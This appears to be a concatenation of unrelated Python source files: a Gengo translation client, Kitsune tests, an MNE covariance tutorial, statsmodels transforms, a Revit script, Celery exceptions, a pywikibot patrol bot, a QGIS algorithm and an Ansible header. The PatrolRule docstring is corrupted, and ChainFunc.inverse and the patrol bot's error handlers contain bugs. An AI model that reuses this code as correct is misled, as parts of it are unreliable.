balance = self.gengo_api.getAccountBalance()
return float(balance['response']['credits'])
@requires_keys
def get_languages(self, raw=False):
"""Returns the list of supported language targets
:arg raw: True if you want the whole response, False if you
want just the list of languages
.. Note::
This is cached until the next deployment.
"""
global GENGO_LANGUAGE_CACHE
if not GENGO_LANGUAGE_CACHE:
resp = self.gengo_api.getServiceLanguages()
GENGO_LANGUAGE_CACHE = (
resp,
tuple([item['lc'] for item in resp['response']])
)
if raw:
return GENGO_LANGUAGE_CACHE[0]
else:
return GENGO_LANGUAGE_CACHE[1]
@requires_keys
def get_language_pairs(self):
"""Returns the list of supported language pairs for human translation
.. Note::
This is cached until the next deployment.
"""
global GENGO_LANGUAGE_PAIRS_CACHE
if not GENGO_LANGUAGE_PAIRS_CACHE:
resp = self.gengo_api.getServiceLanguagePairs()
# NB: This looks specifically at the standard tier because
# that's what we're using. It ignores the other tiers.
pairs = [(item['lc_src'], item['lc_tgt'])
for item in resp['response']
if item['tier'] == u'standard']
GENGO_LANGUAGE_PAIRS_CACHE = pairs
return GENGO_LANGUAGE_PAIRS_CACHE
@requires_keys
def get_job(self, job_id):
"""Returns data for a specified job
:arg job_id: the job_id for the job we want data for
:returns: dict of job data
"""
resp = self.gengo_api.getTranslationJob(id=str(job_id))
if resp['opstat'] != 'ok':
raise GengoAPIFailure(
'opstat: {0}, response: {1}'.format(resp['opstat'], resp))
return resp['response']['job']
def guess_language(self, text):
"""Guesses the language of the text
:arg text: text to guess the language of
:raises GengoUnknownLanguage: if the request wasn't successful
or the guesser can't figure out which language the text is
"""
# get_language is a "private API" thing Gengo has, so it's not
# included in the gengo library and we have to do it manually.
resp = requests.post(
GENGO_DETECT_LANGUAGE_API,
data=json.dumps({'text': text.encode('utf-8')}),
headers={
'Content-Type': 'application/json',
'Accept': 'application/json'
})
try:
resp_json = resp.json()
except ValueError:
# If it's not JSON, then I don't really know what it is,
# so I want to see it in an error email. Chances are it's
# some ephemeral problem.
#
# FIXME: Figure out a better thing to do here.
raise GengoAPIFailure(
u'ValueError: non-json response: {0} {1}'.format(
resp.status_code, resp.text))
if 'detected_lang_code' in resp_json:
lang = resp_json['detected_lang_code']
if lang == 'un':
raise GengoUnknownLanguage('unknown language')
return lang
raise GengoUnknownLanguage('request failure: {0}'.format(resp.content))
@requires_keys
def translate_bulk(self, jobs):
"""Performs translation through Gengo on multiple jobs
Translation is asynchronous--this method posts the translation
jobs and then returns the order information for those jobs
to be polled at a later time.
:arg jobs: a list of dicts with ``id``, ``lc_src``, ``lc_dst``
``tier``, ``text`` and (optional) ``unique_id`` keys
Response dict includes:
* job_count: number of jobs processed
* order_id: the order id
* group_id: I have no idea what this is
* credits_used: the number of credits used
* currency: the currency the credits are in
"""
payload = {}
for job in jobs:
payload['job_{0}'.format(job['id'])] = {
'body_src': job['text'],
'lc_src': job['lc_src'],
'lc_tgt': job['lc_dst'],
'tier': job['tier'],
'type': 'text',
'slug': 'Mozilla Input feedback response',
'force': 1,
'comment': GENGO_COMMENT,
'purpose': 'Online content',
'tone': 'informal',
'use_preferred': 0,
'auto_approve': 1,
'custom_data': job.get('unique_id', job['id'])
}
resp = self.gengo_api.postTranslationJobs(jobs=payload)
if resp['opstat'] != 'ok':
raise GengoAPIFailure(
'opstat: {0}, response: {1}'.format(resp['opstat'], resp))
return resp['response']
@requires_keys
def completed_jobs_for_order(self, order_id):
"""Returns jobs for an order which are completed
Gengo uses the status "approved" for jobs that have been
translated and approved and are completed.
:arg order_id: the order_id for the jobs we want to look at
:returns: list of job data dicts; interesting fields being
``custom_data`` and ``body_tgt``
"""
resp = self.gengo_api.getTranslationOrderJobs(id=str(order_id))
if resp['opstat'] != 'ok':
raise GengoAPIFailure(
'opstat: {0}, response: {1}'.format(resp['opstat'], resp))
job_ids = resp['response']['order']['jobs_approved']
if not job_ids:
return []
job_ids = ','.join(job_ids)
resp = self.gengo_api.getTranslationJobBatch(id=job_ids)
if resp['opstat'] != 'ok':
raise GengoAPIFailure(
'opstat: {0}, response: {1}'.format(resp['opstat'], resp))
return resp['response']['jobs']
|
import json
import django
from django.conf import settings
from django.contrib.sites.models import Site
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect
from django.test.client import RequestFactory
import mock
from nose.tools import eq_
from pyquery import PyQuery as pq
from kitsune.sumo.templatetags.jinja_helpers import urlparams
from kitsune.sumo.middleware import LocaleURLMiddleware
from kitsune.sumo.tests import TestCase
from kitsune.sumo.urlresolvers import reverse
from kitsune.sumo.views import deprecated_redirect, redirect_to
class RedirectTests(TestCase):
rf = RequestFactory()
def test_redirect_to(self):
resp = redirect_to(self.rf.get('/'), url='home', permanent=False)
assert isinstance(resp, HttpResponseRedirect)
eq_(reverse('home'), resp['location'])
def test_redirect_permanent(self):
resp = redirect_to(self.rf.get('/'), url='home')
assert isinstance(resp, HttpResponsePermanentRedirect)
eq_(reverse('home'), resp['location'])
def test_redirect_kwargs(self):
resp = redirect_to(self.rf.get('/'), url='users.confirm_email',
activation_key='1234')
eq_(reverse('users.confirm_email', args=['1234']),
resp['location'])
@mock.patch.object(Site.objects, 'get_current')
def test_deprecated_redirect(self, get_current):
get_current.return_value.domain = 'su.mo.com'
req = self.rf.get('/en-US/')
# Since we're rendering a template we need this to run.
LocaleURLMiddleware().process_request(req)
resp = deprecated_redirect(req, url='home')
eq_(200, resp.status_code)
doc = pq(resp.content)
assert doc('meta[http-equiv=refresh]')
refresh = doc('meta[http-equiv=refresh]')
timeout, url = refresh.attr('content').split(';url=')
eq_('10', timeout)
eq_(reverse('home'), url)
class RobotsTestCase(TestCase):
# Use the hard-coded URL because it's well-known.
old_setting = settings.ENGAGE_ROBOTS
def tearDown(self):
settings.ENGAGE_ROBOTS = self.old_setting
def test_disengaged(self):
settings.ENGAGE_ROBOTS = False
response = self.client.get('/robots.txt')
eq_('User-Agent: *\nDisallow: /', response.content)
eq_('text/plain', response['content-type'])
def test_engaged(self):
settings.ENGAGE_ROBOTS = True
response = self.client.get('/robots.txt')
eq_('text/plain', response['content-type'])
assert len(response.content) > len('User-agent: *\nDisallow: /')
class VersionCheckTests(TestCase):
url = reverse('sumo.version')
def _is_forbidden(self, url):
res = self.client.get(url)
eq_(403, res.status_code)
eq_('', res.content)
@mock.patch.object(settings._wrapped, 'VERSION_CHECK_TOKEN', None)
def token_is_none(self):
self._is_forbidden(self.url)
self._is_forbidden(urlparams(self.url, token='foo'))
@mock.patch.object(settings._wrapped, 'VERSION_CHECK_TOKEN', 'foo')
def token_is_wrong(self):
self._is_forbidden(urlparams(self.url, token='bar'))
@mock.patch.object(settings._wrapped, 'VERSION_CHECK_TOKEN', 'foo')
def token_is_right(self):
res = self.client.get(urlparams(self.url, token='foo'))
eq_(200, res.status_code)
versions = json.loads(res.content)
eq_('.'.join(map(str, django.VERSION)), versions['django'])
class ForceErrorTests(TestCase):
url = reverse('sumo.error')
@mock.patch.object(settings._wrapped, 'STAGE', True)
def test_error(self):
"""On STAGE servers, be able to force an error."""
try:
self.client.get(self.url)
self.fail()
except NameError:
pass
@mock.patch.object(settings._wrapped, 'STAGE', False)
def test_hidden(self):
"""On a non-STAGE server, no forcing errors."""
res = self.client.get(self.url)
eq_(404, res.status_code)
|
"""
.. _tut_compute_covariance:
Computing covariance matrix
===========================
"""
import os.path as op
import mne
from mne.datasets import sample
data_path = sample.data_path()
raw_empty_room_fname = op.join(
data_path, 'MEG', 'sample', 'ernoise_raw.fif')
raw_empty_room = mne.io.read_raw_fif(raw_empty_room_fname)
raw_fname = op.join(data_path, 'MEG', 'sample', 'sample_audvis_raw.fif')
raw = mne.io.read_raw_fif(raw_fname)
raw.info['bads'] += ['EEG 053'] # bads + 1 more
noise_cov = mne.compute_raw_covariance(raw_empty_room, tmin=0, tmax=None)
events = mne.find_events(raw)
epochs = mne.Epochs(raw, events, event_id=1, tmin=-0.2, tmax=0.0,
baseline=(-0.2, 0.0))
noise_cov_baseline = mne.compute_covariance(epochs)
noise_cov.plot(raw_empty_room.info, proj=True)
noise_cov_baseline.plot(epochs.info)
cov = mne.compute_covariance(epochs, tmax=0., method='auto')
evoked = epochs.average()
evoked.plot_white(cov)
covs = mne.compute_covariance(epochs, tmax=0., method=('empirical', 'shrunk'),
return_estimators=True)
evoked = epochs.average()
evoked.plot_white(covs)
|
"""Nonlinear Transformation classes
Created on Sat Apr 16 16:06:11 2011
Author: Josef Perktold
License : BSD
"""
import numpy as np
class TransformFunction(object):
def __call__(self, x):
self.func(x)
class SquareFunc(TransformFunction):
'''class to hold quadratic function with inverse function and derivative
using instance methods instead of class methods, if we want extension
to parameterized function
'''
def func(self, x):
return np.power(x, 2.)
def inverseplus(self, x):
return np.sqrt(x)
def inverseminus(self, x):
return 0.0 - np.sqrt(x)
def derivplus(self, x):
return 0.5/np.sqrt(x)
def derivminus(self, x):
return 0.0 - 0.5/np.sqrt(x)
class NegSquareFunc(TransformFunction):
'''negative quadratic function
'''
def func(self, x):
return -np.power(x,2)
def inverseplus(self, x):
return np.sqrt(-x)
def inverseminus(self, x):
return 0.0 - np.sqrt(-x)
def derivplus(self, x):
return 0.0 - 0.5/np.sqrt(-x)
def derivminus(self, x):
return 0.5/np.sqrt(-x)
class AbsFunc(TransformFunction):
'''class for absolute value transformation
'''
def func(self, x):
return np.abs(x)
def inverseplus(self, x):
return x
def inverseminus(self, x):
return 0.0 - x
def derivplus(self, x):
return 1.0
def derivminus(self, x):
return 0.0 - 1.0
class LogFunc(TransformFunction):
def func(self, x):
return np.log(x)
def inverse(self, y):
return np.exp(y)
def deriv(self, x):
return 1./x
class ExpFunc(TransformFunction):
def func(self, x):
return np.exp(x)
def inverse(self, y):
return np.log(y)
def deriv(self, x):
return np.exp(x)
class BoxCoxNonzeroFunc(TransformFunction):
def __init__(self, lamda):
self.lamda = lamda
def func(self, x):
return (np.power(x, self.lamda) - 1)/self.lamda
def inverse(self, y):
return (self.lamda * y + 1)/self.lamda
def deriv(self, x):
return np.power(x, self.lamda - 1)
class AffineFunc(TransformFunction):
def __init__(self, constant, slope):
self.constant = constant
self.slope = slope
def func(self, x):
return self.constant + self.slope * x
def inverse(self, y):
return (y - self.constant) / self.slope
def deriv(self, x):
return self.slope
class ChainFunc(TransformFunction):
def __init__(self, finn, fout):
self.finn = finn
self.fout = fout
def func(self, x):
return self.fout.func(self.finn.func(x))
def inverse(self, y):
return self.f1.inverse(self.fout.inverse(y))
def deriv(self, x):
z = self.finn.func(x)
return self.fout.deriv(z) * self.finn.deriv(x)
if __name__ == '__main__':
absf = AbsFunc()
absf.func(5) == 5
absf.func(-5) == 5
absf.inverseplus(5) == 5
absf.inverseminus(5) == -5
chainf = ChainFunc(AffineFunc(1,2), BoxCoxNonzeroFunc(2))
print chainf.func(3.)
chainf2 = ChainFunc(BoxCoxNonzeroFunc(2), AffineFunc(1,2))
print chainf.func(3.)
|
import clr
from System.Collections.Generic import *
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
import Autodesk
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
doc = DocumentManager.Instance.CurrentDBDocument
items = UnwrapElement(IN[0])
source_view = UnwrapElement(IN[1])
target_view = UnwrapElement(IN[2])
ids = list()
for item in items:
ids.append(item.Id)
itemlist = List[ElementId](ids)
TransactionManager.Instance.EnsureInTransaction(doc)
newitems = ElementTransformUtils.CopyElements(source_view,itemlist,target_view, None, None)
TransactionManager.Instance.TransactionTaskDone()
elementlist = list()
for item in newitems:
elementlist.append(doc.GetElement(item).ToDSType(False))
OUT = elementlist
|
"""
celery.exceptions
~~~~~~~~~~~~~~~~~
This module contains all exceptions used by the Celery API.
"""
from __future__ import absolute_import
import numbers
from .five import string_t
from billiard.exceptions import ( # noqa
SoftTimeLimitExceeded, TimeLimitExceeded, WorkerLostError, Terminated,
)
__all__ = ['SecurityError', 'Ignore', 'QueueNotFound',
'WorkerShutdown', 'WorkerTerminate',
'ImproperlyConfigured', 'NotRegistered', 'AlreadyRegistered',
'TimeoutError', 'MaxRetriesExceededError', 'Retry',
'TaskRevokedError', 'NotConfigured', 'AlwaysEagerIgnored',
'InvalidTaskError', 'ChordError', 'CPendingDeprecationWarning',
'CDeprecationWarning', 'FixupWarning', 'DuplicateNodenameWarning',
'SoftTimeLimitExceeded', 'TimeLimitExceeded', 'WorkerLostError',
'Terminated']
UNREGISTERED_FMT = """\
Task of kind {0} is not registered, please make sure it's imported.\
"""
class SecurityError(Exception):
"""Security related exceptions.
Handle with care.
"""
class Ignore(Exception):
"""A task can raise this to ignore doing state updates."""
class Reject(Exception):
"""A task can raise this if it wants to reject/requeue the message."""
def __init__(self, reason=None, requeue=False):
self.reason = reason
self.requeue = requeue
super(Reject, self).__init__(reason, requeue)
def __repr__(self):
return 'reject requeue=%s: %s' % (self.requeue, self.reason)
class WorkerTerminate(SystemExit):
"""Signals that the worker should terminate immediately."""
SystemTerminate = WorkerTerminate # XXX compat
class WorkerShutdown(SystemExit):
"""Signals that the worker should perform a warm shutdown."""
class QueueNotFound(KeyError):
"""Task routed to a queue not in CELERY_QUEUES."""
class ImproperlyConfigured(ImportError):
"""Celery is somehow improperly configured."""
class NotRegistered(KeyError):
"""The task is not registered."""
def __repr__(self):
return UNREGISTERED_FMT.format(self)
class AlreadyRegistered(Exception):
"""The task is already registered."""
class TimeoutError(Exception):
"""The operation timed out."""
class MaxRetriesExceededError(Exception):
"""The tasks max restart limit has been exceeded."""
class Retry(Exception):
"""The task is to be retried later."""
#: Optional message describing context of retry.
message = None
#: Exception (if any) that caused the retry to happen.
exc = None
#: Time of retry (ETA), either :class:`numbers.Real` or
#: :class:`~datetime.datetime`.
when = None
def __init__(self, message=None, exc=None, when=None, **kwargs):
from kombu.utils.encoding import safe_repr
self.message = message
if isinstance(exc, string_t):
self.exc, self.excs = None, exc
else:
self.exc, self.excs = exc, safe_repr(exc) if exc else None
self.when = when
Exception.__init__(self, exc, when, **kwargs)
def humanize(self):
if isinstance(self.when, numbers.Real):
return 'in {0.when}s'.format(self)
return 'at {0.when}'.format(self)
def __str__(self):
if self.message:
return self.message
if self.excs:
return 'Retry {0}: {1}'.format(self.humanize(), self.excs)
return 'Retry {0}'.format(self.humanize())
def __reduce__(self):
return self.__class__, (self.message, self.excs, self.when)
RetryTaskError = Retry # XXX compat
class TaskRevokedError(Exception):
"""The task has been revoked, so no result available."""
class NotConfigured(UserWarning):
"""Celery has not been configured, as no config module has been found."""
class AlwaysEagerIgnored(UserWarning):
"""send_task ignores CELERY_ALWAYS_EAGER option"""
class InvalidTaskError(Exception):
"""The task has invalid data or is not properly constructed."""
class IncompleteStream(Exception):
"""Found the end of a stream of data, but the data is not yet complete."""
class ChordError(Exception):
"""A task part of the chord raised an exception."""
class CPendingDeprecationWarning(PendingDeprecationWarning):
pass
class CDeprecationWarning(DeprecationWarning):
pass
class FixupWarning(UserWarning):
pass
class DuplicateNodenameWarning(UserWarning):
"""Multiple workers are using the same nodename."""
|
"""
The bot is meant to mark the edits based on info obtained by whitelist.
This bot obtains a list of recent changes and newpages and marks the
edits as patrolled based on a whitelist.
See http://en.wikisource.org/wiki/User:JVbot/patrol_whitelist
Commandline parameters that are supported:
-namespace Filter the page generator to only yield pages in
specified namespaces
-ask If True, confirm each patrol action
-whitelist page title for whitelist (optional)
-autopatroluserns Takes user consent to automatically patrol
-versionchecktime Check versionchecktime lapse in sec
"""
from __future__ import unicode_literals
__version__ = '$Id$'
import pywikibot
from pywikibot import pagegenerators, Bot
import mwlib.uparser # used to parse the whitelist
import mwlib.parser # used to parse the whitelist
import time
_logger = 'patrol'
docuReplacements = {
'¶ms;': pagegenerators.parameterHelp
}
class PatrolBot(Bot):
"""Bot marks the edits as patrolled based on info obtained by whitelist."""
# Localised name of the whitelist page
whitelist_subpage_name = {
'en': u'patrol_whitelist',
}
def __init__(self, **kwargs):
"""
Constructor.
@kwarg feed - The changes feed to work on (Newpages
or Recentchanges)
@kwarg ask - If True, confirm each patrol action
@kwarg whitelist - page title for whitelist (optional)
@kwarg autopatroluserns - Takes user consent to automatically patrol
@kwarg versionchecktime - Check versionchecktime lapse in sec
"""
self.availableOptions.update({
'ask': False,
'feed': None,
'whitelist': None,
'versionchecktime': 300,
'autopatroluserns': False
})
super(PatrolBot, self).__init__(**kwargs)
self.recent_gen = True
self.user = None
self.site = pywikibot.Site()
if self.getOption('whitelist'):
self.whitelist_pagename = self.getOption('whitelist')
else:
local_whitelist_subpage_name = pywikibot.translate(
self.site, self.whitelist_subpage_name, fallback=True)
self.whitelist_pagename = u'%s:%s/%s' % (
self.site.namespace(2),
self.site.username(),
local_whitelist_subpage_name)
self.whitelist = self.getOption('whitelist')
self.whitelist_ts = 0
self.whitelist_load_ts = 0
self.highest_rcid = 0 # used to track loops
self.last_rcid = 0
self.repeat_start_ts = 0
self.rc_item_counter = 0 # counts how many items have been reviewed
self.patrol_counter = 0 # and how many times an action was taken
def load_whitelist(self):
"""Load most recent watchlist_page for further processing."""
# Check for a more recent version after versionchecktime in sec.
if (self.whitelist_load_ts and (time.time() - self.whitelist_load_ts <
self.getOption('versionchecktime'))):
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist not stale yet')
return
whitelist_page = pywikibot.Page(self.site,
self.whitelist_pagename)
if not self.whitelist:
pywikibot.output(u'Loading %s' % self.whitelist_pagename)
try:
if self.whitelist_ts:
# check for a more recent version
h = whitelist_page.revisions()
last_edit_ts = next(h).timestamp
if last_edit_ts == self.whitelist_ts:
# As there hasn't been any change to the whitelist
# it has been effectively reloaded 'now'
self.whitelist_load_ts = time.time()
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist not modified')
return
if self.whitelist:
pywikibot.output(u'Reloading whitelist')
# Fetch whitelist
wikitext = whitelist_page.get()
# Parse whitelist
self.whitelist = self.parse_page_tuples(wikitext, self.user)
# Record timestamp
self.whitelist_ts = whitelist_page.editTime()
self.whitelist_load_ts = time.time()
except Exception as e:
# cascade if there isnt a whitelist to fallback on
if not self.whitelist:
raise
pywikibot.error(u'%s' % e)
@staticmethod
def add_to_tuples(tuples, user, page):
"""Update tuples 'user' key by adding page."""
if pywikibot.config.verbose_output:
pywikibot.output(u"Adding %s:%s" % (user, page.title()))
if user in tuples:
tuples[user].append(page)
else:
tuples[user] = [page]
def in_list(self, pagelist, title):
"""Check if title present in pagelist."""
if pywikibot.config.verbose_output:
pywikibot.output(u'Checking whitelist for: %s' % title)
# quick check for exact match
if title in pagelist:
return title
# quick check for wildcard
if '' in pagelist:
if pywikibot.config.verbose_output:
pywikibot.output(u'wildcarded')
return '.*'
for item in pagelist:
if pywikibot.config.verbose_output:
pywikibot.output(u'checking against whitelist item = %s' % item)
if isinstance(item, PatrolRule):
if pywikibot.config.verbose_output:
pywikibot.output(u'invoking programmed rule')
if item.match(title):
return item
elif title_match(item, title):
return item
if pywikibot.config.verbose_output:
pywikibot.output(u'not found')
def parse_page_tuples(self, wikitext, user=None):
"""Parse page details apart from 'user:' for use."""
tuples = {}
# for any structure, the only first 'user:' page
# is registered as the user the rest of the structure
# refers to.
def process_children(obj, current_user):
pywikibot.debug(u'Parsing node: %s' % obj, _logger)
for c in obj.children:
temp = process_node(c, current_user)
if temp and not current_user:
current_user = temp
def process_node(obj, current_user):
# links are analysed; interwiki links are included because mwlib
# incorrectly calls 'Wikisource:' namespace links an interwiki
if isinstance(obj, mwlib.parser.NamespaceLink) or \
isinstance(obj, mwlib.parser.InterwikiLink) or \
isinstance(obj, mwlib.parser.ArticleLink):
if obj.namespace == -1:
# the parser accepts 'special:prefixindex/' as a wildcard
# this allows a prefix that doesnt match an existing page
# to be a blue link, and can be clicked to see what pages
# will be included in the whitelist
if obj.target[:20].lower() == 'special:prefixindex/':
if len(obj.target) == 20:
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist everything')
page = ''
else:
page = obj.target[20:]
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist prefixindex hack '
u'for: %s' % page)
# p = pywikibot.Page(self.site, obj.target[20:])
# obj.namespace = p.namespace
# obj.target = p.title()
elif obj.namespace == 2 and not current_user:
# if a target user hasn't been found yet, and the link is
# 'user:'
# the user will be the target of subsequent rules
page_prefix_len = len(self.site.namespace(2))
current_user = obj.target[(page_prefix_len + 1):]
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist user: %s' % current_user)
return current_user
else:
page = obj.target
if current_user:
if not user or current_user == user:
if self.is_wikisource_author_page(page):
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist author: %s' % page)
author = LinkedPagesRule(page)
self.add_to_tuples(tuples, current_user, author)
else:
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist page: %s' % page)
self.add_to_tuples(tuples, current_user, page)
elif pywikibot.config.verbose_output:
pywikibot.output(u'Discarding whitelist page for '
u'another user: %s' % page)
else:
raise Exception(u'No user set for page %s' % page)
else:
process_children(obj, current_user)
root = mwlib.uparser.parseString(title='Not used', raw=wikitext)
process_children(root, None)
return tuples
def is_wikisource_author_page(self, title):
"""Initialise author_ns if site family is 'wikisource' else pass."""
if self.site.family.name != 'wikisource':
return
author_ns = 0
try:
author_ns = self.site.family.authornamespaces[self.site.lang][0]
except:
pass
if author_ns:
author_ns_prefix = self.site.namespace(author_ns)
pywikibot.debug(u'Author ns: %d; name: %s'
% (author_ns, author_ns_prefix), _logger)
if title.find(author_ns_prefix + ':') == 0:
if pywikibot.config.verbose_output:
author_page_name = title[len(author_ns_prefix) + 1:]
pywikibot.output(u'Found author %s' % author_page_name)
return True
def run(self, feed=None):
"""Process 'whitelist' page absent in generator."""
if self.whitelist is None:
self.load_whitelist()
if not feed:
feed = self.getOption('feed')
for page in feed:
self.treat(page)
def treat(self, page):
"""It loads the given page, does some changes, and saves it."""
choice = False
try:
# page: title, date, username, comment, loginfo, rcid, token
username = page['user']
# when the feed isnt from the API, it used to contain
# '(not yet written)' or '(page does not exist)' when it was
# a redlink
rcid = page['rcid']
title = page['title']
if not rcid:
raise Exception('rcid not present')
# check whether we have wrapped around to higher rcids
# which indicates a new RC feed is being processed
if rcid > self.last_rcid:
# refresh the whitelist
self.load_whitelist()
self.repeat_start_ts = time.time()
if pywikibot.config.verbose_output or self.getOption('ask'):
pywikibot.output(u'User %s has created or modified page %s'
% (username, title))
if self.getOption('autopatroluserns') and (page['ns'] == 2 or
page['ns'] == 3):
# simple rule to whitelist any user editing their own userspace
if title.partition(':')[2].split('/')[0].startswith(username):
if pywikibot.config.verbose_output:
pywikibot.output(u'%s is whitelisted to modify %s'
% (username, title))
choice = True
if not choice and username in self.whitelist:
if self.in_list(self.whitelist[username], title):
if pywikibot.config.verbose_output:
pywikibot.output(u'%s is whitelisted to modify %s'
% (username, title))
choice = True
if self.getOption('ask'):
choice = pywikibot.input_yn(
u'Do you want to mark page as patrolled?', automatic_quit=False)
# Patrol the page
if choice:
# list() iterates over patrol() which returns a generator
list(self.site.patrol(rcid))
self.patrol_counter = self.patrol_counter + 1
pywikibot.output(u'Patrolled %s (rcid %d) by user %s'
% (title, rcid, username))
else:
if pywikibot.config.verbose_output:
pywikibot.output(u'Skipped')
if rcid > self.highest_rcid:
self.highest_rcid = rcid
self.last_rcid = rcid
self.rc_item_counter = self.rc_item_counter + 1
except pywikibot.NoPage:
pywikibot.output(u'Page %s does not exist; skipping.'
% title(asLink=True))
except pywikibot.IsRedirectPage:
pywikibot.output(u'Page %s is a redirect; skipping.'
% title(asLink=True))
def title_match(prefix, title):
"""Match title substring with given prefix."""
if pywikibot.config.verbose_output:
pywikibot.output(u'Matching %s to prefix %s' % (title, prefix))
if title.startswith(prefix):
if pywikibot.config.verbose_output:
pywikibot.output(u'substr match')
return True
return
class PatrolRule(object):
"""Bot marks the edit.startswith("-s as patrolled based on info obtained by whitelist."""
def __init__(self, page_title):
"""
Constructor.
@param page_title: The page title for this rule
@type page_title: pywikibot.Page
"""
self.page_title = page_title
def title(self):
"""Obtain page title."""
return self.page_title
def match(self, page):
"""Added for future use."""
pass
class LinkedPagesRule(PatrolRule):
"""Matches of page site title and linked pages title."""
def __init__(self, page_title):
"""Constructor.
@param page_title: The page title for this rule
@type page_title: pywikibot.Page
"""
self.site = pywikibot.Site()
self.page_title = page_title
self.linkedpages = None
def match(self, page_title):
"""Match page_title to linkedpages elements."""
if page_title == self.page_title:
return True
if not self.site.family.name == 'wikisource':
raise Exception('This is a wikisource rule')
if not self.linkedpages:
if pywikibot.config.verbose_output:
pywikibot.output(u'loading page links on %s' % self.page_title)
p = pywikibot.Page(self.site, self.page_title)
linkedpages = list()
for linkedpage in p.linkedPages():
linkedpages.append(linkedpage.title())
self.linkedpages = linkedpages
if pywikibot.config.verbose_output:
pywikibot.output(u'Loaded %d page links' % len(linkedpages))
for p in self.linkedpages:
if pywikibot.config.verbose_output:
pywikibot.output(u"Checking against '%s'" % p)
if title_match(p, page_title):
if pywikibot.config.verbose_output:
pywikibot.output(u'Matched.')
return p
def api_feed_repeater(gen, delay=0, repeat=False, number=1000, namespaces=None,
user=None, recent_new_gen=True):
"""Generator which loads pages details to be processed."""
while True:
if recent_new_gen:
generator = gen(step=number, namespaces=namespaces, user=user,
showPatrolled=False)
else:
generator = gen(step=number, namespaces=namespaces, user=user,
returndict=True, showPatrolled=False)
for page in generator:
if recent_new_gen:
yield page
else:
yield page[1]
if repeat:
pywikibot.output(u'Sleeping for %d seconds' % delay)
time.sleep(delay)
else:
break
def main(*args):
"""Process command line arguments and invoke PatrolBot."""
# This factory is responsible for processing command line arguments
# that are also used by other scripts and that determine on which pages
# to work on.
usercontribs = None
gen = None
recentchanges = False
newpages = False
repeat = False
genFactory = pagegenerators.GeneratorFactory()
options = {}
# Parse command line arguments
for arg in pywikibot.handle_args(args):
if arg.startswith('-ask'):
options['ask'] = True
elif arg.startswith('-autopatroluserns'):
options['autopatroluserns'] = True
elif arg.startswith('-repeat'):
repeat = True
elif arg.startswith('-newpages'):
newpages = True
elif arg.startswith('-recentchanges'):
recentchanges = True
elif arg.startswith('-usercontribs:'):
usercontribs = arg[14:]
elif arg.startswith('-versionchecktime:'):
versionchecktime = arg[len('-versionchecktime:'):]
options['versionchecktime'] = int(versionchecktime)
elif arg.startswith("-whitelist:"):
options['whitelist'] = arg[len('-whitelist:'):]
else:
generator = genFactory.handleArg(arg)
if not generator:
if ':' in arg:
m = arg.split(':')
options[m[0]] = m[1]
site = pywikibot.Site()
site.login()
if usercontribs:
pywikibot.output(u'Processing user: %s' % usercontribs)
newpage_count = 300
if not newpages and not recentchanges and not usercontribs:
if site.family.name == 'wikipedia':
newpages = True
newpage_count = 5000
else:
recentchanges = True
bot = PatrolBot(**options)
if newpages or usercontribs:
pywikibot.output(u'Newpages:')
gen = site.newpages
feed = api_feed_repeater(gen, delay=60, repeat=repeat,
number=newpage_count, user=usercontribs,
namespaces=genFactory.namespaces,
recent_new_gen=False)
bot.run(feed)
if recentchanges or usercontribs:
pywikibot.output(u'Recentchanges:')
gen = site.recentchanges
feed = api_feed_repeater(gen, delay=60, repeat=repeat, number=1000,
namespaces=genFactory.namespaces,
user=usercontribs)
bot.run(feed)
pywikibot.output(u'%d/%d patrolled'
% (bot.patrol_counter, bot.rc_item_counter))
if __name__ == '__main__':
main()
|
"""
***************************************************************************
SelectByExpression.py
---------------------
Date : July 2014
Copyright : (C) 2014 by Michaël Douchin
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Michael Douchin'
__date__ = 'July 2014'
__copyright__ = '(C) 2014, Michael Douchin'
__revision__ = '$Format:%H$'
import processing
from qgis.core import QgsExpression, QgsFeatureRequest
from processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterSelection
from processing.core.outputs import OutputVector
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterString
class SelectByExpression(GeoAlgorithm):
LAYERNAME = 'LAYERNAME'
EXPRESSION= 'EXPRESSION'
RESULT = 'RESULT'
METHOD = 'METHOD'
METHODS = ['creating new selection', 'adding to current selection',
'removing from current selection']
def defineCharacteristics(self):
self.name = 'Select by expression'
self.group = 'Vector selection tools'
self.addParameter(ParameterVector(self.LAYERNAME,
self.tr('Input Layer'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addParameter(ParameterString(self.EXPRESSION,
self.tr("Expression")))
self.addParameter(ParameterSelection(self.METHOD,
self.tr('Modify current selection by'), self.METHODS, 0))
self.addOutput(OutputVector(self.RESULT, self.tr('Output'), True))
def processAlgorithm(self, progress):
filename = self.getParameterValue(self.LAYERNAME)
layer = processing.getObject(filename)
oldSelection = set(layer.selectedFeaturesIds())
method = self.getParameterValue(self.METHOD)
# Build QGIS request with expression
expression = self.getParameterValue(self.EXPRESSION)
qExp = QgsExpression(expression)
if not qExp.hasParserError():
qReq = QgsFeatureRequest(qExp)
else:
raise GeoAlgorithmExecutionException(qExp.parserErrorString())
selected = [f.id() for f in layer.getFeatures(qReq)]
if method == 1:
selected = list(oldSelection.union(selected))
elif method == 2:
selected = list(oldSelection.difference(selected))
# Set the selection
layer.setSelectedFeatures(selected)
self.setOutputValue(self.RESULT, filename)
|
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'curated'}
DOCUMENTATION = '''
---
module: ec2_vpc_subnet_facts
short_description: Gather facts about ec2 VPC subnets in AWS
description:
- Gather facts about ec2 VPC subnets in AWS
version_added: "2.1"
